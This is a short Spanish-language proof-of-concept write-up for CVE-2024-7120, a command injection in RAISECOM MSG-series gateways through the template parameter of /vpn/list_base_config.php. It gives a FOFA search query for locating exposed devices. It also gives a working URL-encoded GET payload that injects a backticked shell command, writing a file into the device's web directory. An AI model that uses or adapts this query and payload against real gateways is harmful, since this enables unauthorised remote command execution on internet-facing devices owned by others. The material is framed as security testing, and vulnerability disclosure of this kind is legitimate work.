
Prueba de concepto de exploit para la vulnerabilidad de inyección de comandos CVE-2024-7120 en dispositivos gateway RAISECOM. Proporciona detalles de explotación, modelos afectados y ejemplos de ataques basados en curl para pruebas de seguridad.
Se ha identificado una vulnerabilidad de inyección de comandos en los dispositivos Gateway de RAISECOM, que afecta a los modelos MSG1200, MSG2100E, MSG2200 y MSG2300. Esta vulnerabilidad permite a atacantes remotos ejecutar comandos arbitrarios en el sistema a través de la interfaz web. El problema reside en el script list_base_config.php, específicamente a través del parámetro template, afectando a más de 25.112 dispositivos en Internet.
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

URI: /vpn/list_base_config.php
Descripción: list_base_config.php es un componente de interfaz web de los dispositivos Gateway de RAISECOM utilizado para gestionar configuraciones de VPN. La vulnerabilidad identificada surge debido al manejo inadecuado del parámetro template en este script. Este parámetro puede ser explotado para ejecutar comandos arbitrarios en el sistema operativo del dispositivo debido a una sanitización insuficiente de las entradas.
CWE-77: Inyección de Comandos
A continuación se muestra un ejemplo de cómo se puede explotar la vulnerabilidad mediante un comando curl:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
En este ejemplo, el comando curl envía una solicitud HTTP GET maliciosa al script list_base_config.php. La solicitud utiliza el parámetro template para ejecutar un comando.

